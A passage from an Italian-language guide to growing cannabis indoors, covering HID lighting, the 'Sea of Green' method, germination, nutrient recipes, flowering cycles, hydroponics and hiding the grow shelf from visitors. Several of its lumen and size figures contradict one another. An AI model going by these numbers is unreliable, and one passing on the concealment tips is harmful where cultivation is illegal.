circoscritte, in più diffonde meglio la luce.) Dipingi anche la mensola di bianco. Oppure utilizza pannelli calorizzari (lett: aluminised mylar), un telo in materiale riflettente o qualche materiale con la superficie argentea. Non usare specchi, visto che il vetro assorbe la luce. Appendi lampade da negozio a catene e assicurati di poterle regolare con ganci o con altri generi di meccanismi in modo che possano essere tenute il più possibile vicino alle piante in ogni momento. Se le lampade sono troppo lontane dalle piante, le piante potrebbero crescere lunghe, con gambi stretti e storti nel tentativo di raggiungere la lampada, e non produrranno molte gemme a maturazione avvenuta. Questo è dovuto essenzialmente alla distanza molto più alta tra gli internodi, cioè la lunghezza del gambo tra ogni gruppo di foglie. Se è più corta, ci possono essere più internodi, così più rami, così una pianta che produce più gemme in meno spazio in tempo di raccolto. La cura della mensola è di tanto in tanto trattata nel capitolo 'Un mare di verde', perché molte piante crescono insieme al chiuso, creando un baldacchino verde di cime che crescono e maturano rapidamente, mentre il raccolto successivo comincia e continua a crescere in un'area separata a luce continua. I cloni vanno sviluppati su una mensola a luce continua, fino a quando attecchiscono ed entrano nella fase di crescita vegetativa, quindi vanno posti su una mensola con 12 ore di luce al giorno per la fioritura. ILLUMINAZIONE All'interno, circa 20000 lumen per metro quadro è il quantitativo minimo per cominciare la coltivazione. Se ti tieni sotto questo livello, la crescita della pianta non sarà certamente tanto rapida quanto nelle sue possibilità, e la lunghezza internodo-fusto aumenterà. Inoltre, anche la distanza della luce dalle piante sarà molto più critica. Regolazioni quotidiane delle lampade saranno così necessarie, e ciò significa che tu non andrai in vacanza. 25000 lumen/mq dovrebbe essere un buon valore, 30000 è ottimale se ti presti ad integrare o arricchire il livello di CO2 (ne parleremo in seguito). Le lampade a luminescenza ad alta intensità (HID: High Intensity Discharge) sono la soluzione migliore per la maggior parte dei coltivatori al coperto. Le lampade HID si dividono in 3 categorie di base: Sodio ad Alta Pressione (HPS: High Pressure Sodium), Alogenuro di Metallo (MH: Metal Halide) e Vapore di Mercurio (MV: Mercury Vapor). L'Alogenuro di Metallo ha uno spettro più ampio, il Vapore del Mercurio è progettato per una intensità più elevata. Il Sodio ad Alta Pressione è una sorta di luce giallastra, forse un pizzico rosa o arancione. La stessa di alcuni lampioni stradali. Le lampade HPS possono essere usate per coltivare un raccolto dall'inizio alla fine. Test dimostrano che il raccolto con HPS matura una settimana dopo rispetto ad un pari raccolto sotto MH, ma è un raccolto più abbondante, così è meglio attendere la settimana aggiuntiva. Le HID più facili da reperire, e le meno costose inizialmente sono le lampade a fluorescenza e al vapore di mercurio. Le MV garantiscono circa 7500 lumen per 175 watt, e i 150 watt delle HPS generano circa 14000 lumen, così le HPS sono quasi il doppio più efficienti. Ma lo spettro del colore prodotto dalle MV non è poi tanto buono. Le HPS hanno elevati valori del rosso, che è particolarmente indicato per la fioritura, mentre le MH sono prestanti nei valori del blu, richiesto per una migliore crescita vegetativa. Sfortunatamente, le lampade MV forniscono lo spettro meno indicato per la crescita della pianta, ma sono veramente economiche. Non sono consigliabili, a meno che tu non riesca a recuperarle gratuitamente, e in più, il rapporto elettricità/efficienza ripaga l'investimento iniziale. Una HPS da 400 watt emetterà intorno ai 4 mila lumen. Per ogni 500 watt di uso continuo, spendi circa 20 dollari americani al mese in elettricità, così è evidente che con una lampada che consuma la metà per produrre gli stessi lumen (o il doppio dei lumen a parità di potenza) pagherai lo stesso in un anno o giù di lì, e da allora in poi, verranno raccolti continui risparmi. Questo è un semplice costo iniziale a confronto con un calcolo delle spese di gestione, e non prende in considerazione una crescita più rapida e l'aumento della produzione che le lampade HPS ti assicurano, dovuto alla quantità di luce disponibile. Se questo è fattorizzato nel calcolo le lampade HPS ti ripagheranno già dal primo raccolto, paragonate alle lampade MV o a fluorescenza, dal momento che raggiungono facilmente il doppio in quanto ad efficienza e fanno crescere i fiori più velocemente e con dimensioni maggiori. Tipo di lampada Watt Lumen per lampadina Efficienza totale Lampada a fluorescenza 40 2800 400 watt = 2800 lumen Vapore di mercurio 175 7500 400 watt = 18500 lumen Alogenuro di metallo 400 33500 400 watt = 33500 lumen Sodio ad alta pressione 400 42000 400 watt = 42000 lumen Nota che le lampade a vapore di mercurio sono meno efficienti di quelle a fluorescenza (FL), e non possono essere posizionate vicino alle piante, così le piante non potranno usare buona parte della luce delle MV. La distribuzione della luce non è buona in entrambi i casi. Le lampade MV semplicemente non sono indicate per la coltura al coperto. Usa esclusivamente lampade fluorescenti, MH o HPS. Le lampade alogene ad arco generano molto calore e non molta luce per il wattaggio che usano, e non sono raccomandate, pur se lo spettro di luce è appropriato per una crescita decente. C'è un nuovo tipo di lampada HPS chiamata Son Agro, ed è disponibile da 250, 400 e 1000 watt. Quella a 400 è in realtà a 430 watt; sono stati aggiunti 30 watt di blu a questa lampadina. E' una lampada molto luminosa (50 mila lumen) ed è pensata per un uso nelle serre. Queste lampadine possono essere acquistate per sostituire le normali lampadine HPS, così possono essere una eventualità se già possiedi una lampada HPS. La cosa bella di questa lampadina è che non si rinuncia alla maggior parte dei vantaggi delle lampade MH, come la minima distanza tra gli internodi e una maturazione precoce, come può confermare la maggior parte degli utilizzatori delle HPS, e si hanno tutti i vantaggi delle lampade HPS. Un'unica lampadina che fa tutto. La lunghezza internodale delle piante cresciute con la Son Agro è la più corta che si sia mai vista con qualsiasi tipo di lampada. Le piante cresciute sotto questa lampada sono incredibilmente folte, compatte e si sviluppano molto in fretta. Le lampadine Son Agro comunque, non durano tanto a lungo quanto una normale lampadina HPS. C'è una differenza di circa il 25% in meno nella vita della lampadina. La lampada all'alogenuro di metallo (MH) è un'altra alternativa, ed è disponibile in lampadine sia da 33500 che da 37000 lumen per 400 watt. La super lampadina (Super Bulb - 37000 lumen) costa circa 10-15 dollari, e garantisce un extra di 3500 lumen. Credo che la Super Bulb possa durare più a lungo; in tal caso, è la soluzione da prendere. La luce dell'alogenuro è più blu e migliore della HPS per la crescita vegetativa, ma complessivamente è molto meno efficiente della HPS. E' possibile acquistare delle lampadine di conversione per una lampada MH che la converte a HPS, ma il costo della lampadina-convertitore è maggiore della lampadina Son Agro con la correzione del colore, così è raccomandabile acquistare soltanto una Son Agro HPS. Anche se costa di più inizialmente, risparmierai energia e soldi dopo, ed è molto più facile da appendere rispetto a 10 tubi fluorescenti. Se possiedi una lampada MH da 33500 lumen che gira a 400 watt ed una HPS da 5 mila lumen che gira a 430 watt, qual'è la più indicata? Quale garantirà un miglior raccolto? Naturalmente, la Son Agro HPS, anche se il costo iniziale è più elevato. A dire il vero, il regolatore di corrente aggiungerà un buon 10% in più al wattaggio complessivo. La lampadina Son Agro si rivelerà di gran lunga migliore della MH per ogni utilizzo. La MH non dura molto a lungo, ma è più conveniente. Confronta i 36 dollari per una lampadina MH da 400 watt contro i 40 dollari per una HPS. Aggiungi 15 dollari per la Son Agro HPS. La HPS ha una durata media superiore di due volte. 21 mila ore contro 10 mila. La Son Agro è di 16 mila o giù di lì. Ancora, più la vita della lampadina è lunga e più luce aggiungi, risparmiando denaro per l'energia. Sistemare orizzontalmente una HID è una buona idea, visto che aumenterà del 30% la quantità di luce che normalmente giunge alle piante. La maggior parte delle HID vendute per l'uso in giardini al coperto in questo periodo sono sistemate in questa posizione orizzontale. La HPS ha un funzionamento molto meno costoso di qualsiasi altro tipo di lampada, ma viene venduta a 70 watt nei negozi di articoli per la casa. Questa taglia non è molto indicata, ma surclassa la FL in efficienza, così potrebbe essere una valida alternativa alla FL per progetti su piccola scala, tipo 1 metro quadro o meno. Oltre il metro quadro, hai bisogno di più luce di quanta una di queste lampade può apportare, ma potresti usare due di queste. Le lampade HPS da 70 watt costano 40 dollari ciascuna, complete. Due lampade sarebbero 140 watt che irraggiano 11000 lumen, che è un risultato migliore di quello delle FL, ma una HPS da 150 watt diffonde 16500 lumen, la vita della lampadina è più lunga, le lampadine sono più convenienti e la lampada opera con maggiore efficienza. Il problema più grosso è che le lampade di media potenza come le HPS da 150 e 250 watt costano quasi come la più grande da 400. Per questa ragione se hai spazio per la lampada più grande, compra quella da 400. Se sei d'accordo, un modello da 1080 watt è altresì disponibile, ma potresti trovare una migliore diffusione della luce con due da 400 piuttosto che una lampada grande. Naturalmente le due lampade più piccole sono più costose da acquistare che una lampada grande, così la maggior parte delle persone sceglie la lampada più grande per operazioni più grandi. Produrre calore nella stanza è una caratteristica delle lampade HID, e quanta luce le piante possono assimilare è determinata dalla temperatura, dal livello di CO2, dalla disponibilità di nutrimento, dal pH, e da altri fattori. Una lampada troppo grande per un spazio richiederà una necessaria ventilazione costante, ed allora non c'è altra soluzione che arricchire la CO2, dal momento che ne risente immediatamente. Costo della lampadina: il costo della lampadina HPS da 70 watt è di 24 dollari, da 150 è solo di 30, e da 400 è solo di 40. In questo modo spenderai di più a sostituire due HPS da 70 watt che una da 400 watt. Aggiungi anche che il più basso valore per rivendere il modello da 70 watt è praticamente nullo per il fatto che sono usate e non soddisfano più questa domanda, e risulta evidente che 189 dollari per una HOP da 250 o 219 dollari per una da 400, può essere che valga il prezzo. Tieni a mente che per 30 in più, puoi avere la lampada più grande (400 watt) e irradiare oltre 1850 lumen di luce in più della lampada più piccola. Niente male! Qui di seguito c'è un'analisi dei prezzi: Tipo di lampada Costo complessivo Costo lampadina Vita lampadina Lumen HPS 400 219 dollari USA 40 dollari USA 18000 ore 4650 0 MH 400 175 dollari USA 37 dollari USA 10000 ore 33500 Son Agro 400 235 dollari USA 55 dollari USA 15000 ore 49000 Super MH 400 190 dollari USA 45 dollari USA ? 37000 MH 250 149 dollari USA 32 dollari USA ? 19500 HPS 250 165 dollari USA 36 dollari USA ? 25000 HPS agro 250 180 dollari USA 53 dollari USA ? 28000 MH 150 139 dollari USA 25 dollari USA ? 13000 HPS 175 150 dollari USA 30 dollari USA ? 15500 Se stai cercando uno questi tipi di lampade, guarda sulle Pagine Gialle alla voce giardinaggio, serre ed illuminazione per giardini al coperto nella tua zona. Qui in Italia, ho potuto notare che le lampadine HPS e MH a bulbo più convenienti sono le philips: Philips HPS son-t 250W (per superfici di circa ½ mq -> fase di fioritura); Philips HPS son-t 400W (per superfici di circa 1 mq -> fase di fioritura); Philips MH hqt 250W (per superfici di circa ½ mq -> fase di crescita vegetativa); Philips MH hqt 400W (per superfici di circa 1 mq -> fase di crescita vegetativa); e le osram [n.d.t.]. MARE DI VERDE Il 'Mare di Verde' (SOG: Sea of Green) è la teoria della raccolta di una parte di piccole pianticelle, portate alla maturazione in breve tempo per ottenere la più rapida produzione di gemme a disposizione. Invece di crescere solo poche piante per un periodo più lungo di tempo, nello stesso spazio si fanno crescere molte piante più piccole che maturano velocemente ed in meno tempo. Così, è richiesto un tempo minore tra i raccolti. Questo sarà importante per te quando ti arriveranno a casa ogni mese le bollette della luce. Si può iniziare un raccolto mentre l'altro matura, ottenendo così una produzione a ciclo continuo, che può essere mantenuta per tutto il corso dell'anno. 30-40 piante per metro quadro (4 piante per piede quadrato) dovrebbero essere un buon inizio. 10 piante per metro quadro ti garantiranno spazio in abbondanza tra ogni pianta per sviluppare le parti superiori, ma non garantiranno molte diramazioni più in basso. Questo va bene per l'interno, dove i rami bassi sono sempre in qualche modo ombreggiati, e non cresceranno molto bene a meno che tu non provveda a fornire più luce e spazio. Il coltivatore al coperto capisce al volo che le piante troppo alte non crescono abbastanza nelle parti basse così da rendere inutile il tempo extra dedicato alla coltivazione. Questa è un'eccezione alla regola se si vuole portare ad un certo punto le piante all'aperto, e si ritiene che il rapporto luce/ombra non sia un fattore determinante. Le piante, se sono state seminate allo stesso tempo, dovrebbero formare quello che viene chiamato un "baldacchino verde" che trattiene la maggior parte della luce nelle zone alte delle piante. Una luce fioca filtra sotto questo livello, visto che le piante sono così vicine tra loro. Il giardiniere si presta a concentrarla sulla cima della pianta, e usa la luce e lo spazio per meglio avvantaggiarsi nel minor tempo possibile. L'uso di recinzioni di nylon o sostegni simili sistemati sul baldacchino verde sosterrà le piante quando iniziano a piegarsi sotto il peso delle voluminose estremità fiorite. Possono essere usati anche dei paletti, ma non è facile inserirli per le piante in mezzo e in fondo allo spazio, dove è più difficile arrivarci. Volere grandi piante è scontato, dal momento che producono di più per pianta, ma di solito è meglio, con uno spazio limitato, coltivare piante più piccole che maturano più in fretta e stanno in spazi ridotti. Il 'Mare di Verde' è stato sviluppato in Olanda. Invece di stipare 4 piante grandi in uno spazio angusto, si mettono 12 più piccole su una mensola sopra a 12 altre pianticelle. Queste piante abbisognano solo di 3-4 mesi per maturare dalla germinazione alle gemme mature, e il raccolto può aver luogo in continuazione. GERMINAZIONE Fai crescere i semi in terreno povero (se decidi di piantare all'aperto) o in ambiente idroponico a base di lana di roccia o di vermiculite. Non usare uno scatolone riempito per piantare i semi. Prove non ufficiali e l'esperienza dimostrano che questi "cubi di torba" non servono a nulla ma anzi arrestano lo sviluppo della pianta. Piantare nella vermiculite dà alla pianticella così tanto ossigeno, ed è così facile per le radici svilupparsi, che le piante si rivelano già grandi una settimana dopo la germinazione! Tienile all'umido per tutto il tempo, piantando i semi in tazze da 500 grammi con buchi sul fondo riempite con vermiculite, sistemate in una bacinella di soluzione nutriente diluita oppure concentrata in contenitori in lana di roccia funzionerà altrettanto bene. Quando il seme germoglia, sistema i cubi in lana di roccia in altri contenitori in lana di roccia più grandi. Non ripiantarli in vaso o trapiantarli altrove, e non metterli insieme alla terra! Puoi coltivare i semi in una carta assorbente. Questo metodo è complicato; è facile compromettere le radici se vengono asciugate, o piantate troppo tardi dopo la germinazione. La carta assorbente asciuga veramente in fretta! Metti la carta assorbente in una vaschetta, riempita con soluzione nutriente diluita (non troppo!), e coprila con un involucro di plastica per impedire che evapori. Metti la vaschetta in un posto al caldo; sopra una stufa a gas, un termosifone, o sopra lampade calde. Coprila con carta nera per impedire alla luce di entrare. Controllala ogni 12 ore e pianta i semi germinati, allo spuntare delle cime (se possibile) in un ambiente naturale indicato per la crescita tanto presto quanto lo spuntare delle radici dal seme sia di 2 millimetri o più. Serviti di pinzette, e non toccare le punte delle radici. Trapianta i semi il meno possibile lasciandoli germinare nello stesso contenitore in cui decidi di coltivare la pianta per un periodo significativo di tempo. Pianta esclusivamente in vermiculite o in lana di roccia. Sarai stupito dai risultati! Il 90% della germinazione si basa su questo metodo, confrontato al 50% o meno degli scatoloni (lett: Jiffy Cubes). (Il tuo profitto può variare.) Il nutrimento per piante 5-55-17 come il Peter's Professional incentiverà lo sviluppo delle radici del seme che germina e delle giovani piantine. Usa una soluzione molto diluita, in acqua distillata, circa 1/3 della concentrazione normale, e mantieni la temperature tra i 22 e i 25 gradi. Un clima caldo è di fondamentale importanza. Secondo l'esperienza di molti coltivatori si ha un basso indice di germinazione se la temperatura non è compresa tra questi valori. Un termostato impostato su valori bassi o medi può rivelarsi indispensabile, oppure una mensola continuamente riscaldata da una luce, ma prova con pochi semi, prima di dedicare i raccolti degli anni a venire a quel sistema. Nessuna luce è indispensabile visto che può rallentare la germinazione. Copri i semi che germinano con carta nera per impedire alla luce di entrare. Metti le pianticelle alla luce una volta che sono germogliate. Proponiti di trapiantare solo una volta o due prima del raccolto. Serviti del più grande contenitore a tua disposizione per lo spazio e il numero di pianticelle che intendi coltivare. Le piante soffrono se le trapianti continuamente e ritardano il raccolto. Soffrirai anche tu, dall'eccessiva fatica! 13 bottiglie di plastica di Coca Cola da 2 litri riempite con vermiculite/perlite staranno giuste in una vaschetta come, ad esempio, una lettiera per gatti e non richiederanno trapianto per il primo raccolto, se intendi coltivare idroponicamente. Trapiantale per un secondo raccolto rigenerato. Elimina i buchi sul fondo dei contenitori e riempi i pochi centimetri rimasti in cima al contenitore solo di vermiculite, per piantare i semi o per consentire il trapianto delle piantine. Dal momento che la vermiculite trattiene molto bene l'acqua, ma non può trattenerne molta, le radici hanno sempre molto ossigeno, anche se sono poste in una vaschetta piena d'acqua. Il fertilizzante basato su perossido di idrogeno è usato per apportare ossigeno addizionale alle piante quando i recipienti sono tenuti continuamente pieni (d'acqua). L'acqua può essere lasciata diminuire ogni volta dopo l'innaffiamento, prima di aggiungere una nuova soluzione. Questo permette alle radici delle piante di asciugarsi bene, e assicura un sufficiente apporto di ossigeno. Usa il prodotto SuperSoil quando metti la terra nel vaso, perché è eccellente e sterilizzato. Se vuoi continuare a prendere terra dal cortile, sterilizzala in un forno a microonde o in uno tradizionale fino a quando non si appanna il vetro. NON RACCOMANDATO: sterilizza i contenitori con una soluzione a base di candeggina, specialmente se sono stati usati nella stagione precedente per coltivare altro. CRESCITA VEGETATIVA Una volta germogliata, la pianta comincia la crescita vegetativa. Questo vuol dire che la pianta inizierà il processo di fotosintesi per svilupparsi in altezza il più possibile e formerà molte diramazioni (piccioli) per ogni coppia di foglie. Il picciolo (lett: grow tip) è la parte che può essere clonata o riprodotta in forma asessuata. E' localizzato all'apice della pianta e in ogni principale internodo. Se tagli l'apice della pianta, allora ottieni due piccioli in cima. Se tagli ciascuno di questi, avrai 4 piccioli in cima alla pianta. (Dal momento che ci vuole tempo perché la pianta riassorba e si riprenda dal trauma della potatura, è più rapido crescere 4 piante più piccole senza tagliarle affatto. Oppure coltivare 2 piante, e farle crescere in modo da riempire lo stesso spazio. La maggior parte dei coltivatori lo prova. Tutte le piante hanno uno stadio vegetativo in cui crescono il più rapidamente possibile subito dopo la germinatura della pianta dal seme. E' possibile coltivare le piante senza periodi di buio, ed aumentare la velocità con la quale crescono di un buon 15-30%. Le piante possono essere riprodotte vegetativamente, cioè senza il concorso di organi sessuali, indefinitamente. Sta al giardiniere decidere quando forzare la pianta a fiorire. Una pianta può crescere da 30 cm a 3,5 m prima di essere forzata a fiorire, così ogni giardiniere ha molta libertà per amministrarsi il proprio giardino in base agli obiettivi che vuole conseguire e allo spazio disponibile. Una soluzione di 20-20-20 con minerali in tracce è usata sia per le colture idroponiche che per quelle in terra quando crescono in continuazione sotto luce. Il nutrimento per piante Miracle Grow Patio o RapidGrow va bene per ciò. Un nutrimento ad alto contenuto di fosforo (high P) come il Peter's 5-50-17 è utilizzato per far fiorire e fruttificare le piante quando stanno per 12 ore al giorno. Sale inglese (1 cucchiaino da tè) dovrebbe essere usato nella soluzione per l'apporto di magnesio e minerali a base di zolfo. Minerali in tracce sono altrettanto indispensabili, se il tuo nutrimento non li include. Il Miracle Grow Patio include questi elementi in tracce, ed è caldamente consigliato. Mantieni un'illuminazione continua per i germogli, dal momento che non richiedono periodi di buio come le piante più mature. Non avrai bisogno di un timer a meno che non voglia tenere le lampade spente per un certo periodo al giorno. Cerca di illuminare le piante per 18 o più ore, o in continuazione in questa fase. Curva il fusto della pianticella avanti e indietro per spingerlo ad essere molto spesso e robusto. Steli lunghi e sottili non possono sostenere una crescita pesante dei germogli. Un ventilatore interno ridurrà l'umidità sugli stomi delle foglie e migliorerà anche la robustezza del fusto. L'importanza della circolazione dell'aria interna non può essere mai sottolineata a sufficienza. Rafforzerà le piante e le farà crescere più forti, mentre ridurrà molte insidie che potrebbero mettere a rischio il tuo raccolto. SOLUZIONE VEGETATIVA IDROPONICA, per gallone (circa 4 litri): - Miracle Grow Patio (contiene elementi in tracce): 1 cucchiaino - Sale inglese: 1/2 cucchiaino - Urina umana (OPZIONALE- può provocare odori sgradevoli in ambienti chiusi.): 1/4 di tazza - Nutrimento per piante arricchito con ossigeno (OPZIONALE): 1 cucchiaino Questo cocktail assicurerà alle tue piante tutti i principali e secondari nutrimenti nella soluzione, e in più tratterà le tue piante con ossigeno per una crescita ottimale delle radici, e nitrato di potassio per una buona qualità di combustione. Un altro "ingrediente" per una buona fase di sviluppo è 1/4 di cucchiaino di fertilizzante Peter's 20-20-20 per gallone d'acqua, con elementi in tracce ed ossigeno aggiunto, o emulsioni di pesce. Le emulsioni di pesce sono eccezionali in serre o all'aperto, dove gli odori non sono un problema, ma non sono raccomandate per gli interni, a causa del loro fetore. FIORITURA La pianta sarà indotta a fruttificare o fiorire con cicli di buio di 11-13 ore che simulano l'approssimarsi dell'inverno all'autunno con l'accorciarsi delle giornate. Di conseguenza, va meglio all'aperto avere due aree separate; una usata per l'iniziale stato vegetativo ed una per la fioritura e la fruttificazione. Non c'è nessuna altra necessità oltre a mantenere cicli di buio, molto buio senza intermezzi di luce, altrimenti le piante possono ritardare la fioritura di giorni o addirittura settimane. Una volta che la pianta è abbastanza sviluppata per la maturazione (30 cm o più), periodi di buio sono richiesti per la maggior parte delle piante per fiorire e produrre i frutti. Ciò ti costringerà a mettere un timer alla lampada, per ricreare regolari e rigidi periodi di buio e di luce ininterrotta. In serra lo stesso effetto può essere causato d'estate (giorni lunghi) coprendola con una coperta per creare periodi di oscurità più lunghi. Un rigido orario di copertura delle piante alle ore 20 e di scoperta alle 8 del mattino per 2 settimane spingerà le tue piante a fiorire. Dopo le prime 2 settimane l'orario può essere più flessibile, ma sarà ancora necessario continuare questa routine per le piante fino alla completa fioritura senza regredire allo stadio della crescita vegetativa. All'aperto, in primavera e in autunno, le notti sono sufficientemente lunghe da spingerle a fiorire di continuo. Porta semplicemente le piante dall'interno all'esterno in questo periodo, e le piante fioriranno naturalmente. In estate inoltrata, con l'avvicinarsi dell'autunno, può essere necessario solamente forzare la fioritura nelle prime due settimane, quindi il rapido allungarsi della notte farà il resto. Dai alle piante in fioritura nutrimenti ad alto contenuto di fosforo e mantienile in un rigoroso regime di 12 ore di illuminazione, senza luce, o al massimo la luna piena durante il ciclo di buio. 13 ore di luce, 11 di buio possono aumentare le dimensioni del fiore e inoltre permettono alla pianta di entrare in fioritura. Serviti di periodi di buio più lunghi per velocizzare la maturazione verso la fine del ciclo di fioritura (8-10 giorni). Ciò comunque ridurrà il raccolto complessivo. Si possono usare due mensole, una identica all'altra, se si desidera fare esclusivamente del giardinaggio al coperto. Le luci di una mensola sono impiegate per 12-13 ore, e quelle dell'altra restano accese di continuo. Le piante vengono tirate su a luce continua, e spostate nell'altra mensola per maturare con la fioritura dopo diverse settimane. Questa mensola per la fioritura dovrebbe essere più grande della mensola di partenza o della crescita vegetativa, in modo da sistemare piante più grandi. O altrimenti, alcune piante possono essere portate fuori, se non c'è abbastanza spazio sulla mensola della fioritura, per tutto il loro prossimo raccolto. Una tenda per fermare la luce può essere costruita con del vinile nero, o altro materiale opaco, con un materiale riflettente sull'altro lato per riflettere la luce alle piante. Questa tenda può essere bloccata con una cordicella quando viene riavvolta per lavorare nel tuo piccolo giardino, e può essere fissata con del velcro per impedire alla luce di filtrare. Se la mensola è posizionata in alto, non sarà molto visibile, e potrà stare in ogni stanza. I curiosi non la vedranno mai a meno che tu non la indichi a loro, dal momento che si trova sopra il livello degli occhi, e nessuna luce proviene da là. le piante fioriscono con nutrimenti di fosforo a livelli molto alti, del tipo 5-50-17, ma anche il 10-20-10 dovrebbe essere adeguato. Le sostanze nutrienti dovrebbero essere accompagnate ogni volta da un innaffiamento quando le piante sono in prima fioritura. Elementi in tracce sono altrettanto necessari; cerca di trovare cibi che li includono, così non devi usare anche un cibo a base di elementi in tracce a parte. Un piccolo miglioramento domestico consiste nel servirsi di soluzioni a base di elementi in tracce ricche di ferro, quelle usate per integrare le carenze dei prati, che possono essere adattate alla coltivazione dell'erba. I prezzi per questi fertilizzanti in serie sono di gran lunga più convenienti di quelli specifici per colture idroponiche venduti in negozi di giardinaggio, e sembra che funzionino egregiamente. SOLUZIONE IDROPONICA PER LA FIORITURA, per gallone: - 1 cucchiaino di nutrimento per piante high P, come il 15-30-15, o il 5-50-17, ecc... - 1/ 2 cucchiaino di sale inglese - 1 cucchiaino di nutrimento per piante arricchito con ossigeno (facoltativo) - 1 cucchiaino di sostanza con elementi in tracce Non posso evidenziare abbastanza che durante la FASE DI FIORITURA, i periodi di buio non devono essere violati da luce normale. Ritarda lo sviluppo del fiore per via degli ormoni contenuti nella pianta che reagiscono alla luce. Se devi lavorare sulle piante in questo periodo, lascia filtrare solo una luce dell'intensità di una luna molto pallida e per meno di 5 minuti. Pota le piante il meno possibile durante l'intera fase di fioritura. Si può usare una luce verde per lavorare nel giardino durante il periodo di buio senza reazioni negative da parte delle piante. Queste sono vendute come luci di sicurezza per serre, ma qualsiasi lampadina verde dovrebbe essere OK. E' preferibile non visitare il giardino nelle ore di buio. Personalmente, preferisco lasciare illuminato il mio giardino dalle 7 di sera alle 7 del mattino, così posso fare una visita al giardino di notte dopo il lavoro e la mattina prima di andare a lavorare, e per tutto il resto della giornata, quando sono troppo occupato per preoccuparmene, lui sta là indisturbato al buio, continuando a fiorire... Le piante in fiore non dovrebbero essere innaffiate spesso perché questo faciliterà la formazione di muffa e putredine. Al chiuso mantieni bassi i livelli di umidità durante la fioritura, perché questo è il periodo più delicato per le piante. Una prima fioritura si nota 1-2 settimane dopo l'ultima esposizione alla luce per 12 ore al giorno. Cerca 2 peli bianchi che emergono da una piccola area bulbosa per ogni internodo. Questo è il modo più facile per verificare subito se la pianta è femmina. Non puoi distinguere un maschio da un femmina dall'altezza, o dalla rigogliosità delle foglie. A 3-6 settimane dall'ultima esposizione alla luce, le tue piante saranno coperte di questi pistilli bianchi che spuntano da ogni picciolo sulla pianta. Sarà letteralmente ricoperta di questi. Questi sono i fiori maturi, che continuano a crescere e a coprire la pianta. Alcune piante faranno questo indefinitamente fino a quando la luce sarà nuovamente tornata. A questo punto sei pronto per vedere i fiori esistenti divenire maturi (senti che la pianta ha abbastanza fiori), riaccendi le luci per 8-10 ore. Ora la pianta comincerà a maturare rapidamente, e dovrebbe essere pronta per il raccolto in 2-3 settimane. L'alternativa è permettere alla pianta di maturare con qualsiasi durata naturale del giorno disponibile all'aperto, o tenere le piante ad un regime costante di 12 ore per l'intero processo di fioritura, che può aumentare la produzione, ma impiegare più tempo. Le piante possono fiorire all'aperto nell'ultima fase, anche se i giorni sono ancora troppo lunghi per una normale fioritura. Una volta che la pianta ha raggiunto quasi il picco dello sviluppo floreale, è anche troppo avanti per regredire rapidamente allo stadio della crescita vegetativa, e la fioritura definitiva si verificherà malgrado tutto. Questo libererà spazio prezioso al coperto in poco tempo, per il prossimo lotto di cloni da fiorire. Osserva quando i peli bianchi diventano rossi, arancioni o marroni, e i finti baccelli (hai scartato bene i maschi?) si ingrossano di resina. Quando la maggior parte dei pistilli ha cambiato colore (circa l'80%), i fiori sono maturi per il raccolto. Non toccare quelle gemme! Tocca solo le grandi foglie a ventaglio se vuoi ispezionare le gemme, altrimenti il THC resterà sulle tue dita, riducendo così la produzione complessiva. COLTURE IDROPONICHE La maggior parte dei coltivatori riferisce che un sistema idroponico svilupperà le piante più velocemente rispetto ad un sistema tradizionale a base di terra, dando alle piante le stesse caratteristiche genetiche e condizioni ambientali. Questo può essere dovuto ad una maggiore attenzione e controllo dei nutrimenti, e ad un più ricco apporto di ossigeno. Le piante possono respirare con più facilità, e per questo, impiegano meno tempo per crescere. Un rapporto indica come le piante che hanno cominciato nella terra, maturate dopo le piante idroponiche, partono con due settimane di ritardo! Una rapida crescita garantisce una maturazione anticipata e un periodo di crescita totale per il raccolto più ristretto. Inoltre, con misture di terra, la crescita della pianta tende a rallentare quando le piante iniziano a fissarsi alla terra con le radici. Le colture idroponiche assicurano inoltre, una rapida crescita senza interruzioni per un trapianto in blocco ed elimina il lavoro e i materiali del ripiantare nel vaso qualora la lana di roccia fosse già usata. (Molto consigliato!) I sistemi idroponici di gran lunga più facili da usare sono lo stoppino e i sistemi a serbatoio. Questi sono indicati come Metodi Idroponici Passivi, perché non richiedono alcun sistema di distribuzione dell'acqua su una scala attiva (pompa, drenaggio, misuratore di flusso e corso). Questi sistemi si basano sul fatto che tu puoi portare l'acqua nei punti che preferisci se l'ambiente e le condizioni primarie sono corretti. Il sistema dello stoppino è più complesso del sistema del serbatoio, dal momento che gli stoppini devono essere tagliati e sistemati nei vasi, devono essere scavati nei vasi buchi corretti, e bisogna ricavare dello spazio per sistemare le piante sopra il serbatoio dell' acqua. Questo può essere più semplice con due secchi, uno sistemato dentro all'altro, o una piscina in gomma per bambini con mattoni all'interno su cui sistemare i vasi, elevandoli oltre la soluzione nutriente. Trovo che l'installazione dello stoppino sia più funzionale del sistema del serbatoio. L' installazione iniziale è laboriosa con gli stoppini, e le piante si sviluppano maggiormente in altezza nella stanza, occupando prezioso spazio verticale. La base del vaso non può restare molto stabile in confronto ad un sistema a serbatoio, ed una pianta rovesciata a terra non sarà mai uguale ad una pianta intatta, a causa dello stress e dello shock del recupero. Il sistema del serbatoio ha bisogno solo di un buon ambiente adattato al compito, ed una pentola in cui mettere un vasetto. Se si usano strisce di lana di roccia, mezza striscia di lana di roccia da 30 centimetri sta perfettamente in una vaschetta tipo una lettiera per gatti. Le radici si sviluppano per via orizzontale (fortunatamente) ed hanno a disposizione molto spazio per crescere. Le piante cresciute in questa maniera sono molto robuste perché ricevono molto ossigeno alle radici. Le piante cresciute con il sistema idroponico a serbatoio si sviluppano con un ritmo analogo a quello del metodo degli stoppini o di altri metodi idroponici attivi, con molto meno impegno richiesto, dal momento che è di gran lunga il più semplice dei metodi idroponici. Le piante possono essere annaffiate e nutrite soltanto con una soluzione che fluisce nel serbatoio ogni pochi giorni. Le vaschette occupano veramente poco spazio verticale e sono facili da maneggiare e da spostare. In un metodo idroponico tradizionale, le vaschette sono riempite con una mistura di lava/vermiculite in un rapporto di 4 a 1. Si aggiunge 'Dolite Lime', un cucchiaio per gallone (circa 4 litri). Questo sistema fermerà e accumulerà acqua, anche se è dotato di un eccellente drenaggio ed anche della capacità di immagazzinare aria. E comunque, non è molto riutilizzabile, come anche è difficile da riprendere e sterilizzare dopo il raccolto. Usa lava di piccole dimensioni, quelle di un pisello di 7,5/20 cm per intenderci, e lava via la polvere, più e più volte, fino a quando se ne è quasi tutta andata. Bagna la vermiculite (asciutta è pericolosa, indossa una maschera) e mescolala nelle vaschette. Le vaschette quadrate sono più capienti di quelle rotonde. La vermiculite si depositerà sul fondo dopo ripetuti innaffiamenti dall'alto, in modo 